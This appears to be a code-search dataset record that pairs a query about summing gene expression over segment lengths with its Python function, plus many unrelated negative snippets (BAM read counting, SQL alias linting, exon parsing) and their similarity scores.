np.concatenate([self.vt, vt_ov1])", "def expression(self) -> Expression:\n ...", "def part(expr,address):\n for num in address:\n expr = expr.args[num]\n return expr", "def g(t1):\n if isinstance(t1, IdentExp) and self.st.has_key(t1.name):\n ninfo = self.st[t1.name]\n if ninfo[\"srcty\"] == \"vector\":\n if self.existMats and t1.name == n.exp.lhs.name:\n return ArrayRefExp(t1, IdentExp(\"i2\"))\n else:\n self.st[\"itrs\"][0].update({ninfo[\"len\"][0]: \"i1\"})\n return ArrayRefExp(t1, IdentExp(\"i1\"))\n elif ninfo[\"srcty\"] == \"matrix\":\n self.st[\"itrs\"][0].update({ninfo[\"len\"][0]: \"i1\"})\n self.st[\"itrs\"][1].update({ninfo[\"len\"][1]: \"i2\"})\n sub = s2t(\"exp\", ninfo[\"len\"][0] + \" * i2 + i1\")\n return ArrayRefExp(t1, sub)\n else:\n return t1\n else:\n return t1", "async def test_get_tx_exon_coords(test_db, nm_152263_exons):\n resp = test_db.get_tx_exon_coords(\"NM_152263.3\", nm_152263_exons, 1, 8)\n assert resp[0] == ((0, 234), (822, 892))\n assert resp[1] is None\n\n resp = test_db.get_tx_exon_coords(\"NM_152263.3\", nm_152263_exons, 1, 11)\n assert resp[0] is None\n assert resp[1] == \"Exon 11 does not exist on NM_152263.3\"", "def 
get_equations(self, combo=None):\n if combo is None:\n return self._equations\n else:\n return [self._equations[i] for i in self.combos[combo]]", "def _get_parts_ignore_EQU(parse_tree):\n first_part = parse_tree[0]\n second_part = parse_tree[1]\n if second_part.label() == 'EQU':\n second_part = parse_tree[2]\n\n if first_part.label() == 'SYN':\n syn = first_part\n other = second_part\n else:\n syn = second_part\n other = first_part\n\n return other, syn", "def parse_expr(self) -> SyntaxNode:\n return self._parse_cat_binary(\"S\", self.parse_term)", "def get_features_expression(self):\n \n # Get the model from cache or disk based on the model_name in request\n self._get_model_by_name()\n \n # Prepare the expression as a string\n delimiter = \" &'|'& \"\n\n # Get the complete feature definitions for this model\n features_df = self.model.original_features_df.copy()\n \n # Set features that are not expected in the features expression in Qlik\n exclude = [\"excluded\"]\n\n if not self.model.lag_target:\n exclude.append(\"target\")\n if not self.model.lags:\n exclude.append(\"identifier\")\n\n # Exclude columns that are not expected in the request data\n exclusions = features_df['variable_type'].isin(exclude)\n features_df = features_df.loc[~exclusions]\n \n # Get the feature names\n features = features_df[\"name\"].tolist()\n \n # Prepare a string which can be evaluated to an expression in Qlik with features as field names\n self.response = pd.Series(delimiter.join([\"[\" + f + \"]\" for f in features]))\n \n # Send the reponse table description to Qlik\n self._send_table_description(\"expression\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n # Finally send the response\n return self.response", "def update_exon(self, line, exon):\n args = self.extract_exon_args(line)\n exon.add_indices(args['indices'])\n exon.add_identifier(args['identifier'])\n if 'score' in args:\n exon.add_score(args['score'])", "def _eval(self, segment, parent_stack, **kwargs):\n if segment.is_type(\"select_statement\"):\n aliases = self._get_aliases_from_select(segment)\n if not aliases:\n return None\n\n # Iterate through all the references, both in the select clause, but also\n # potential others.\n sc = segment.get_child(\"select_clause\")\n reference_buffer = list(sc.recursive_crawl(\"object_reference\"))\n # Add any wildcard references\n reference_buffer += list(sc.recursive_crawl(\"wildcard_identifier\"))\n for potential_clause in (\n \"where_clause\",\n \"groupby_clause\",\n \"having_clause\",\n \"orderby_clause\",\n ):\n clause = segment.get_child(potential_clause)\n if clause:\n reference_buffer += list(clause.recursive_crawl(\"object_reference\"))\n # PURGE any references which are in nested select statements\n for ref in reference_buffer.copy():\n ref_path = segment.path_to(ref)\n # is it in a subselect? i.e. 
a select which isn't this one.\n if any(\n seg.is_type(\"select_statement\") and seg is not segment\n for seg in ref_path\n ):\n reference_buffer.remove(ref)\n\n # Get all column aliases\n col_aliases = []\n for col_seg in list(sc.recursive_crawl(\"alias_expression\")):\n for seg in col_seg.segments:\n if seg.is_type(\"identifier\"):\n col_aliases.append(seg.raw)\n\n # Get any columns referred to in a using clause, and extract anything\n # from ON clauses.\n using_cols = []\n fc = segment.get_child(\"from_clause\")\n for join_clause in fc.recursive_crawl(\"join_clause\"):\n in_using_brackets = False\n seen_using = False\n seen_on = False\n for seg in join_clause.segments:\n if seg.is_type(\"keyword\") and seg.name == \"USING\":\n seen_using = True\n elif seg.is_type(\"keyword\") and seg.name == \"ON\":\n seen_on = True\n elif seen_using and seg.is_type(\"start_bracket\"):\n in_using_brackets = True\n elif seen_using and seg.is_type(\"end_bracket\"):\n in_using_brackets = False\n seen_using = False\n elif in_using_brackets and seg.is_type(\"identifier\"):\n using_cols.append(seg.raw)\n elif seen_on and seg.is_type(\"expression\"):\n # Deal with expressions\n reference_buffer += list(\n seg.recursive_crawl(\"object_reference\")\n )\n\n # Work out if we have a parent select function\n parent_select = None\n for seg in reversed(parent_stack):\n if seg.is_type(\"select_statement\"):\n parent_select = seg\n break\n\n # Pass them all to the function that does all the work.\n # NB: Subclasses of this rules should override the function below\n return self._lint_references_and_aliases(\n aliases, reference_buffer, col_aliases, using_cols, parent_select\n )\n return None" ]
[ "0.5563815", "0.5293783", "0.5213351", "0.49248624", "0.49004447", "0.48478526", "0.4781561", "0.47813958", "0.4710072", "0.4675474", "0.4543498", "0.45414433", "0.45138633", "0.44763458", "0.44727144", "0.44690332", "0.4463009", "0.44608518", "0.44598845", "0.44542956", "0.44500953", "0.44333282", "0.4429923", "0.4429744", "0.44134194", "0.43991935", "0.4379504", "0.43580562", "0.435443", "0.43541926", "0.43358815", "0.4333481", "0.42984396", "0.42917535", "0.42908773", "0.42908773", "0.42892784", "0.42871898", "0.42836833", "0.4283146", "0.42744425", "0.4266373", "0.42654127", "0.42645666", "0.42576957", "0.42566288", "0.42557424", "0.42527026", "0.4221265", "0.42153218", "0.42069823", "0.42032298", "0.42013884", "0.4186482", "0.4184196", "0.41836718", "0.41781208", "0.4178088", "0.4176565", "0.4171007", "0.41650006", "0.41483182", "0.41483182", "0.41483182", "0.41476166", "0.41426983", "0.41402292", "0.4127464", "0.41228002", "0.41221514", "0.4111588", "0.41034365", "0.4097107", "0.40949774", "0.40945148", "0.4093672", "0.40926147", "0.4092118", "0.4090904", "0.40903312", "0.40903312", "0.4085974", "0.40584293", "0.40549442", "0.40530902", "0.4051325", "0.40507746", "0.40494725", "0.4047425", "0.40399706", "0.4024256", "0.40220213", "0.40191698", "0.4018539", "0.4016527", "0.4005557", "0.40029174", "0.3996928", "0.398798", "0.3986516" ]
0.56654406
0
get total reads count for the given sample and the given gene; actually total_expr = reads_length * total_reads_counts
def get_total_gene_expr(gene, countinfo, Idx, seg_expr, cross_graph_expr):
    if len(seg_expr.shape) == 1:
        n_samples = 1
    else:
        n_samples = seg_expr.shape[1]
    if countinfo is None or Idx.sample is None:
        return [np.nan] * n_samples
    seg_len = gene.segmentgraph.segments[1] - gene.segmentgraph.segments[0]
    if cross_graph_expr:
        total_expr = np.sum(seg_len * seg_expr.T, axis=1)
        total_expr = total_expr.tolist()
    else:
        total_expr = [np.sum(seg_len * seg_expr)]
    return total_expr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_count_total_reads(self):\n \n bam = pybedtools.BedTool(clipper.test_file(\"allup_test.bam\"))\n gene_dfn = pybedtools.BedTool(clipper.test_file(\"hg19_genes.bed\"))\n \n result = count_total_reads(bam, gene_dfn)\n \n self.assertEqual(result, 2086)", "def test_count_reads_in_region_total(self):\n self.c.skipZeros = False\n self.c.stepSize = 200\n self.c.binLength = 200\n resp, _ = self.c.count_reads_in_region(self.chrom, 0, 200)\n nt.assert_equal(resp, np.array([[2, 4.]]))", "def sum_reads(self, sample):\n total_reads = 0.0\n arts = lims.get_artifacts(samplelimsid = sample.id, process_type = self.process_types)\n for art in arts:\n if art.qc_flag == 'PASSED' and '# Reads' in art.udf:\n total_reads += float(art.udf.get('# Reads'))\n return total_reads/1000000", "def readlen_cnts(store, filter_srrs=None, keep_srrs=None):\n df = store['prealn/workflow/fastq'].copy()\n df.reset_index(inplace=True)\n df = remove_rows(df, 'srr', filter_srrs)\n df = keep_rows(df, 'srr', keep_srrs)\n df['len'] = df[['avgLen_R1', 'avgLen_R2']].max(axis=1)\n\n return df.len.min(), df.len.median(), df.len.mode().iloc[0], df.len.max()", "def reads_in_chromosome(self, chromosome):\n return sum(m.read_info(self.dataset_name).total_read_count \n for m in self.dataset if m.position not in SPECIAL_POSITIONS.all_undefined and m.position.chromosome==chromosome)", "def gatherReadCounts(samplesList, scriptsDir, threads, alignmentPath, outRoot, stype, mode):\n reads = 0\n ext = \".pruned.bam\"\n if mode == \"all_reads\":\n ext = \".bam\"\n for i in range(len(samplesList)):\n bam = os.path.join(alignmentPath, outRoot) + \".\" + stype + \".\" + str(i) + ext\n reads += int(subprocess.run([os.path.join(scriptsDir, \"get_readcount.sh\"), bam, str(threads)], capture_output=True, text=True).stdout.strip(\"\\n\"))\n return reads", "def count_total(self):\n total = 0\n rpk_total = 0.0\n with open(self.filename, 'rU') as my_htseq:\n for line in my_htseq:\n if '_' not in line:\n line = line.rstrip('\\n').split('\\t')\n ensg_id = line[0]\n gene_len = len(set(self.gtf.gene_coords[ensg_id])) / 1000.0\n count = int(line[1])\n total += count\n rpk_total += float(count/gene_len)\n return total, rpk_total", "def get_read_len(wildcards):\n read_len = caseinfo.loc[(wildcards.sample, wildcards.unit), \"read_len\"]\n return int(read_len)", "def test_count_reads_in_region_extension_1(self):\n self.c = cr.CountReadsPerBin([self.bamFile1, self.bamFile2],\n binLength=1,\n stepSize=50,\n extendReads=25)\n\n resp, _ = self.c.count_reads_in_region(self.chrom, 0, 200)\n\n nt.assert_equal(resp, np.array([[0, 0.],\n [0, 1.],\n [1, 1.],\n [1, 2.]]))", "def feature_total_lengths(genefile, ignore_multiple_splice_variants=False, genome_fasta_file=DEFAULT_NUCLEAR_GENOME_FILE):\n # BCBio uses 0-based and end-exclusive positions (first-third base is bases 0,1,2, i.e range 0-3), so length is straightforward\n feature_total_lengths = defaultdict(int)\n total_genome_length = 0\n # get the total chromosome lengths from genome_fasta_file if given - needed to calculate total intergenic length \n if genome_fasta_file:\n with open(genome_fasta_file) as FASTAFILE: fasta_seq_dict = SeqIO.to_dict(SeqIO.parse(FASTAFILE, \"fasta\"))\n else: fasta_seq_dict = {}\n with open(os.path.expanduser(genefile)) as GENEFILE:\n for chromosome_record in GFF.parse(GENEFILE, base_dict=fasta_seq_dict):\n total_genome_length += len(chromosome_record.seq)\n for gene_record in chromosome_record.features:\n gene_length = gene_record.location.end.position - 
gene_record.location.start.position\n feature_total_lengths['gene'] += gene_length\n if len(gene_record.sub_features) == 0:\n raise NoRNAError(\"Gene %s has no RNA - can't determine CDS start/end!\"%gene_record.id)\n if len(gene_record.sub_features) > 1:\n if ignore_multiple_splice_variants: \n feature_total_lengths['MULTIPLE_SPLICE_VARIANTS'] += gene_length\n continue\n else: \n raise MultipleRNAError(\"Gene %s has multiple RNAs - can't determine single CDS start/end!\"%gene_record.id)\n else:\n features = gene_record.sub_features[0].sub_features\n for feature in features:\n feature_total_lengths[feature.type] += (feature.location.end.position - feature.location.start.position)\n # calculate total intron length from total gene and exon/UTR length\n feature_total_lengths['intron'] = feature_total_lengths['gene'] - sum(length for feature,length \n in feature_total_lengths.items() if feature != 'gene')\n # calculate total intergenic length from total genome and gene length\n feature_total_lengths['all'] = total_genome_length\n feature_total_lengths['intergenic'] = total_genome_length - feature_total_lengths['gene']\n return dict(feature_total_lengths)", "def get_total_coverage(bam_file, outfile):\n # Run samtools idxstats (this get the coverage for all transcripts:\n # assigne the outfile with the temp folder to keep thing more tidy\n oufile_dir_file = os.path.join(\"temp_reads_per_base\",\n outfile)\n cmd = \" \".join(['samtools',\n 'idxstats',\n bam_file,\n '>',\n oufile_dir_file])\n # data was saved in idxstats_filename\n # call the func\n pipe = subproces_func(cmd)\n # creat a dictioanry to hold all the total expression values for the\n # transcripts.\n overall_expression_dic = dict()\n with open(oufile_dir_file, \"r\") as handle:\n for line in handle:\n data = line.rstrip(\"\\n\").split(\"\\t\")\n transcript = data[0]\n overall_expression_dic[transcript] = [int(x) for x in data[1:]]\n # print overall_expression_dic[\"Mp_O_20647_c0_seq2\"]\n # returns a dictionary: key[transcript], vals = ['577', '274', '0'] len,\n # reads_mapped, last_coloumn\n return overall_expression_dic", "def count_samples(self):\n return sum(SEQ_LENGTHS)", "def get_read_length(read_fn, n_read=10000):\n with GzipFile(read_fn, mode='rb') as f:\n h = SeqIO.QualityIO.FastqGeneralIterator(f)\n i = 0\n l = []\n while i < n_read:\n try:\n t = h.next()\n l.append(len(t[1]))\n i += 1\n except StopIteration:\n logger.warning(\"Requested %d reads but reached the end of the file after %d\", n_read, i)\n return int(np.round(np.mean(l)))", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def _get_total_read_size(self):\n if self.read_size:\n read_size = EVENT_SIZE * self.read_size\n else:\n read_size = EVENT_SIZE\n return read_size", "def countReadCoverage(bam,chrom,start,end,strand=None):\n\n coverage = []\n start = int(start)\n end = int(end)\n for i in range(end-start+1):\n coverage.append(0.0)\n\n i = 0\n if chrom in bam.references:\n for pcol in bam.pileup(chrom,start,end):\n n = 0\n if pcol.pos >= start and pcol.pos <= end:\n for read in pcol.pileups:\n if strand == '+':\n if not read.alignment.is_reverse and read.alignment.mapq >= 0 and not read.alignment.is_duplicate:\n n += 1\n elif strand == '-':\n if read.alignment.is_reverse and read.alignment.mapq >= 0 and not read.alignment.is_duplicate:\n n += 1\n else:\n if read.alignment.mapq >= 0 and not 
read.alignment.is_duplicate:\n n += 1\n coverage[i] = n\n i += 1\n\n return coverage", "def get_total_hits(records_blob):\n hits_tag = records_blob.getElementsByTagName('totalHits')[0]\n return int(hits_tag.firstChild.nodeValue)", "def get_number_seqs_for_primer(percent_match,\n seq_count):\n \n total_seq_use=int((1-percent_match)*seq_count)\n \n return total_seq_use", "def GetNumSamples(trrecord, samplelists=[]):\n if len(samplelists) == 0: samplelists.append(None)\n return [sum(trrecord.GetGenotypeCounts(samplelist=sl).values()) for sl in samplelists]", "def total(**metafilter):\n metafilter = _clean(metafilter)\n search = _build(metafilter)\n return search.count()", "def count_seqs_from_file(fasta_file, parser=parse_fasta):\r\n result = 0\r\n lens = []\r\n for record in parser(fasta_file):\r\n result += 1\r\n lens.append(len(record[1]))\r\n if result == 0:\r\n return result, None, None\r\n else:\r\n return result, mean(lens), std(lens)", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def query_coverage(self):\n s = self.query_aln.replace(\"=\", \"\")\n return len(s)", "def average_length_of_gene(self):\n return sum([len(e) for e in self.population]) / len(self.population)", "def count_number_of_reads(filename: Path) -> int:\n\tif filename.suffix == '.gz':\n\t\tcommand = f\"zcat {filename}\"\n\telse:\n\t\tcommand = f\"cat {filename}\"\n\tprocess = subprocess.Popen(command.split(), stdout = subprocess.PIPE)\n\toutput = subprocess.check_output([\"wc\", \"-l\"], stdin = process.stdout)\n\n\treads = int(output.strip()) / 4\n\treturn int(reads)", "def count(self, sub, start=0, end=None):\n return count(self, sub, start, end)", "def count_single_mirbase_reads(bam, counts_file):\n count_ref_hits(bam, counts_file)", "def count(self, *columns):\n if not columns:\n columns = ['*']\n\n return int(self.aggregate('count', *columns))", "def GetSampleCount(self) :\r\n\t\tCurSampleCount = 0\r\n\t\ttry :\r\n\t\t\tself.DB_Cursor.execute(self.SQLCMDs['SampleCount'])\r\n\t\t\tCurSampleCount = self.DB_Cursor.fetchone()[0]\r\n\t\texcept Exception as detail:\r\n\t\t\tlogging.error(\"Failed to get count of samples in database: %s\"%detail)\r\n\t\treturn CurSampleCount", "def count_total(\n reference_seq, # type: pyfaidx.Sequence\n pattern=None, # type: str\n intervals=None # type: Iterable[Tuple[str, int, int]]\n): # type: (...) 
-> int\n\n regex = _build_regex(pattern)\n\n if intervals is None:\n # Simply count for the entire sequence.\n count = sum(_count_sequence(reference_seq[seq], regex=regex)\n for seq in reference_seq.keys()) # yapf: disable\n else:\n # Flatten intervals, and then only count for sequences\n # within the flattened intervals.\n merged_intervals = list(merge_genomic_intervals(intervals))\n\n seqs = [\n reference_seq[chrom][start:end]\n for chrom, start, end in merged_intervals\n ]\n\n count = sum(_count_sequence(seq, regex=regex) for seq in seqs)\n\n return count", "def getSampleCount(self,study_id):\n try:\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n count=0\n results=con.cursor().callproc('get_sample_count', [study_id,\\\n count])\n \n return results[1]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def count(self, base):\n return self._dna.count(base)", "def get_total_number_of_documents(self):\n return self.total_number_of_documents", "def test_get_coverage_of_region_split_read(self):\n\n # turn of read extension\n self.c.extendPairedEnds = False\n self.c.bamFilesList = [self.bamFile1]\n self.c.binLength = 10\n self.c.stepSize = 10\n resp, _ = self.c.count_reads_in_region('chr_cigar', 0, 100)\n nt.assert_array_equal(resp, np.array([[0.],\n [1.],\n [1.],\n [0.],\n [1.],\n [0.],\n [0.],\n [0.],\n [0.],\n [0.]]))", "def total_samples(self):\n\n totals = self.recording_data()['totals']\n return totals[0] + totals[1]", "def total_record_count(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"total_record_count\")", "def count(self):\n\t\treturn sum(read.copy for read in self.__iter__())", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. 
Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def compute_ave_score_w_sample(genes, samples):\n\n scores = np.zeros(len(genes), dtype=np.uint32)\n\n for i, v in enumerate(genes):\n for j in samples:\n score, _ = run_duel(v, j)\n scores[i] += score\n continue\n continue\n\n return scores / len(samples)", "def getTotalNumRRI(self):\n return self.analyze.tg_ecg_get_total_rri_count()", "def cellranger_counts(fname, genome=\"matrix\"):\n with tables.open_file(fname, \"r\") as f:\n try:\n group = f.get_node(f.root, genome)\n except tables.NoSuchNodeError:\n print(\"That genome does not exist in this file.\")\n return None\n gene_ids = getattr(group, \"features/id\").read()\n barcodes = getattr(group, \"barcodes\").read()\n data = getattr(group, \"data\").read()\n indices = getattr(group, \"indices\").read()\n indptr = getattr(group, \"indptr\").read()\n shape = getattr(group, \"shape\").read()\n\n matrix = sp_sparse.csc_matrix((data, indices, indptr), shape=shape)\n gene_ids = np.array([x.decode() for x in gene_ids])\n barcodes = np.array([x.decode().replace(\"-1\", \"\") for x in barcodes])\n\n return CellRangerCounts(matrix, gene_ids, barcodes)", "def count_total_mutations(seqs, database):\n total = 0\n for seq in seqs:\n total += count_minimum_mutations(seq, database)\n return total", "def get_num_passes_from_example(example):\n assert len(\n example.features.feature['subreads/num_passes'].int64_list.value) == 1\n return example.features.feature['subreads/num_passes'].int64_list.value[0]", "def total_samples_processed(self):\n return self._total_samples_processed", "def get_count(cls):\n total = 0\n for counter in SimpleCounterShard.objects.all():\n total += counter.count\n return total", "def dcount(ev):\n profData = getProfilingData(ev)\n if profData is not None:\n a = profData.Descendants().AsArray()\n if len(a) > 0:\n return profData.DescendantCount(a[0])\n return \"\"", "def get_total_rows(max_passes: int) -> int:\n # For each of `max_subreads`, we have three pieces of information: bases, PW,\n # and IP. We also have four rows for SN, and one for strand.\n # The information is structured as follows:\n # Bases: (0, params.max_passes - 1) represent bases.\n # PW: rows params.max_passes to (params.max_passes * 2 - 1)\n # IP: rows (params.max_passes * 2) to (params.max_passes * 3 - 1)\n # Strand: rows (params.max_passes * 3) to (params.max_passes * 4)\n # CCS+SN: rows (params.max_passes * 4 + 1) to (params.max_passes * 4 + 5)\n # The last five rows are CCS sequence (1), and SN (4).\n return (max_passes * 4) + 5", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def get_total_count(self):\n return self.total_count", "def get_doc_count(self, index_name, doc_type):\n return self.es.count(index_name, doc_type)[\"count\"]", "def count_total(self):\n\t\twith self._c_lock: # I can't believe I implemented a lock for a counter. 
Safety first, I guess...\n\t\t\treturn self._total_count", "def count(seq):\n\treturn sum(1 for x in seq)", "def readlen(store, cutoff=30, filter_srrs=None, keep_srrs=None):\n df = store['prealn/workflow/fastq'].copy()\n df.reset_index(inplace=True)\n df = remove_rows(df, 'srr', filter_srrs)\n df = keep_rows(df, 'srr', keep_srrs)\n df['len'] = df[['avgLen_R1', 'avgLen_R2']].max(axis=1)\n\n return df.loc[df['len'] >= cutoff, ['srx', 'srr']]", "def countNodes(epr):\n result = 1\n argLst = epr.args\n for arg in argLst:\n result += countNodes(arg)\n return result", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def count_total(self):\n\t\twith self._c_lock: # I can't believe I implemented a lock for a counter. Safety first, I guess...\n\t\t\treturn self._total_count", "def total_read_throughput(self):\n total = self.read_throughput\n for index in six.itervalues(self.global_indexes):\n total += index.read_throughput\n return total", "def count(self, e):\n try:\n return self.vals[e]\n except:\n return 0", "def count_matches(sam_input):\n logging.info(\"Counting aligned bases in %s ...\", sam_input.name)\n\n total_bases = 0\n with pysam.AlignmentFile(sam_input, \"r\") as sam:\n for read in sam:\n total_bases += aligned_bases(read.cigar)\n return total_bases", "def total_exs(dataset):\n total = 0\n for article in dataset['data']:\n for para in article['paragraphs']:\n total += len(para['qas'])\n return total", "def hit_coverage(self):\n s = self.hit_aln.replace(\"=\", \"\")\n return len(s)", "def _get_hit_count(self, database, enquire):\n return self._get_enquire_mset(\n database, enquire, 0, database.get_doccount()\n ).size()", "def est_read_len(fq, reads=100):\n if is_gz_file(fq):\n openf = gzip.open\n else:\n openf = open\n readlens = []\n with openf(fq) as f:\n try: # File less than 4*reads lines\n for _ in range(reads):\n next(f)\n readlens.append(len(next(f).strip()))\n next(f), next(f)\n except:\n pass\n return median(readlens)", "def total_count(self):\n res = self.con.execute('select sum(count) from cc').fetchone();\n if res == None:\n return 0\n return res[0]", "def _cmd_genemetrics(args):\n cnarr = read_cna(args.filename)\n segarr = read_cna(args.segment) if args.segment else None\n is_sample_female = verify_sample_sex(cnarr, args.sample_sex, args.male_reference, args.diploid_parx_genome)\n # TODO use the stats args\n table = do_genemetrics(\n cnarr,\n segarr,\n args.threshold,\n args.min_probes,\n args.drop_low_coverage,\n args.male_reference,\n is_sample_female,\n args.diploid_parx_genome,\n )\n logging.info(\"Found %d gene-level gains and losses\", len(table))\n write_dataframe(args.output, table)", "def getQiimeSffSamplesCount(self,sample):\n try:\n con = self.getSFFDatabaseConnection()\n results = 0\n query_results=con.cursor().callproc('get_qiime_sff_samples_count', \\\n [str(sample),results])\n return query_results\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), str(e))\n return False", "def count(a, sub, start=0, end=None):\n return _vec_string(a, int_, 'count', [sub, start] + _clean_args(end))", "def count(self):\n return len(self.read_ints())", "def countReads(commands_list, bamFile,\n referenceGTF = \"/n/data1/hms/dbmi/farhat/Jerry/References/GCF_000195955.2_ASM19595v2_genomic.gtf\"):\n outputName = genReadcountsName(bamFile)\n countCommand = \"featureCounts -t gene -g locus_tag -a {refGTF} -o {outputName} {bFile}\".format(\n refGTF = referenceGTF, outputName = 
outputName, bFile = bamFile)\n commands_list.append(countCommand)", "def count():", "def count_coverage(self, contig=None, start=None, stop=None, region=None,\n quality_threshold=15, read_callback='all',\n reference=None, end=None, base_quality_threshold=0):\n\n signature = locals()\n for key in ['self', 'quality_threshold', 'read_callback', 'base_quality_threshold']:\n signature.pop(key)\n\n adenine = array.array('L', [0] * (stop - start + 1))\n cytosine = adenine[:]\n guanine = adenine[:]\n thymine = adenine[:]\n\n for read in self.fetch(**signature):\n if read.cigarstring is not None and read.mapq >= quality_threshold:\n if filter_read(read, read_callback):\n for base, index in cigar_alignment(seq=read.seq, cigar=read.cigarstring,\n start_pos=read.pos, qualities=read.query_qualities,\n base_qual_thresh=base_quality_threshold):\n if start <= index <= stop:\n if base == 'A':\n adenine[index - start] += 1\n elif base == 'G':\n guanine[index - start] += 1\n elif base == 'C':\n guanine[index - start] += 1\n elif base == 'T':\n thymine[index - start] += 1\n else:\n raise ValueError('Read base was {}, not A, T, C, or G'.format(base))\n\n return adenine, cytosine, guanine, thymine", "def get_count(bam, max_workers):\n print (\"Count total number of paired reads in %s ...\"%bam)\n cmd = ['samtools','view','-c','-f', '3','-@',str(max_workers),bam]\n out, err = subprocess.Popen(cmd, stdin = subprocess.PIPE, stdout=subprocess.PIPE).communicate()\n return int(out.split()[0])", "def count(self, contig=None, start=None, stop=None, region=None,\n until_eof=False, tid=None, read_callback='nofilter',\n reference=None, end=None):\n\n # pass the signature to fetch\n signature = locals()\n signature.pop('read_callback')\n signature.pop('self')\n roi_reads = self.fetch(**signature)\n # make `nofilter` the default filter unless told otherwise\n # read_callback = kwargs.get('read_callback', 'nofilter')\n\n # go through all the reads over a given region and count them\n count = 0\n for read in roi_reads:\n if filter_read(read, read_callback):\n count += 1\n return count", "def count(self, chromosome):\n return self.chromosome_list.count(to_chromosome(chromosome))", "def count(self, sub) -> int:\n pass", "def calculate_reference(gram_list, references):\n gram_sub_str = ' '.join(gram_list)\n gram_count = []\n for item in references:\n # calculate the count of the sub string\n gram_count.append(len(re.findall(gram_sub_str, item)))\n return gram_count", "def getQiimeSffReadCounts(self,seq_run_id):\n try:\n con = self.getSFFDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('get_qiime_sff_read_counts', \\\n [seq_run_id,results])\n return results\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), str(e))\n return False", "def written_reads(self) -> int:\n return sum(self._written_lengths1.values())", "def get_total_result_count(self, *args, **kwargs):\n return 0", "def total(self):\n return self._evaluate()['hits']['total']", "def calculate_reference(gram_list, references):\r\n gram_sub_str = ' '.join(gram_list)\r\n gram_count = []\r\n for item in references:\r\n # calculate the count of the sub string\r\n gram_count.append(len(re.findall(gram_sub_str, item)))\r\n return gram_count", "def count(sequences, ordering = None, material = 'rna',\n dangles = 'some', T = 37, multi = True, pseudo = False,\n sodium = 1.0, magnesium = 0.0):\n \n ## Set up command-line arguments and input\n args, cmd_input = \\\n setup_nupack_input(exec_name = 'count', sequences = sequences, 
ordering = ordering,\n material = material, sodium = sodium, magnesium = magnesium,\n dangles = dangles, T = T, multi = multi, pseudo = pseudo)\n \n ## Perform call\n output, error = call_with_pipe(args, cmd_input)\n\n ## Parse and return output\n if output[-3] != \"% Total number of secondary structures:\" :\n raise NameError('NUPACK output parsing problem')\n\n return float(output[-2]) # the number of structures can be very large", "def uses(self):\n recipe_count = Quantity.query.filter_by(id_ingredient=self.id).count()\n subrecipe_count = Subquantity.query.filter_by(id_ingredient=self.id).count()\n return recipe_count + subrecipe_count", "def _calc_coverage(self, cds_aln):\n # Aligned region is part of a read that intersects with cds.\n coverage = 0\n for aln_reg in cds_aln.aligned_regions.values(): # aln_reg is of type CdsAlnSublocation\n location = aln_reg.location # location is of type Location\n coverage += location.length()\n coverage = coverage / float(Location.from_location_str(cds_aln.cds.location).length())\n return coverage", "def read_count(self):\n return self._read_count", "def getTotalIndividualCount(self):\r\n return self._n", "def total_count(self) -> int:\n return self.__total_count", "def Count_Documents(db):\r\n \r\n count = db.Transaction.estimated_document_count()\r\n print(\"Number of documents in the database Transaction: \" + str(count) + \".\\n\")\r\n return count", "def count(self):\n return self._reduce_for_stat_function(F.count, only_numeric=False)", "def gal_count(clusters):\n sum = 0\n for x in clusters:\n sum += x.ngal\n return sum", "def getReferenceIndividualCount(self, sample_id):\r\n if sample_id in self._data:\r\n return self._data[sample_id][0]\r\n else:\r\n raise ValueError(\"Unknown sample '%s'.\" % sample_id)", "def total_record_count(self) -> int:\n return pulumi.get(self, \"total_record_count\")", "def _get_count(self, msg, subtype=\"all\"):\n try:\n counts = self.get_local(msg, \"counts\")\n return counts.get(subtype, 0)\n except KeyError:\n return 0", "def totalcounts(self):\n return self.datacounts + self.bkgdcounts", "def count_unique_mirbase_reads(bam, counts_file):\n count_ref_hits(bam, counts_file)", "def CountOccurrences(pattern, bwt, starts, occ_counts_before):\n # Implement this function yourself\n return 0", "def compute_reread_counts(self, question, context):\n\n # Checks that the question and context are not blank\n if question == '' or context == '':\n return {}\n\n # Collects the reread count for every student id of the provided context and question\n raw_reread_counts = []\n for row in self.responses:\n table_context = row.context.text\n table_question = row.question.text\n view_count = len(row.get_parsed_views())\n if context in table_context:\n if question in table_question:\n raw_reread_counts.append(view_count)\n\n # Tallies the raw reread counts into the dictionary to be returned\n organized_data = {}\n mean_reread_count = 0\n sum_of_views = 0\n student_count = 0\n final_student_count = 0\n\n for entry in raw_reread_counts:\n if entry in organized_data.keys():\n organized_data[entry] += 1\n elif len(raw_reread_counts) != 0:\n organized_data.update({entry: 1})\n keys_of_dictionary = organized_data.keys()\n for entry in keys_of_dictionary:\n sum_of_views += entry * organized_data[entry]\n student_count += organized_data[entry]\n\n if student_count == 0:\n return 0\n else:\n mean_reread_count = round((sum_of_views / student_count), 2)\n sum_of_views = 0\n final_student_count = student_count\n student_count = 0\n\n 
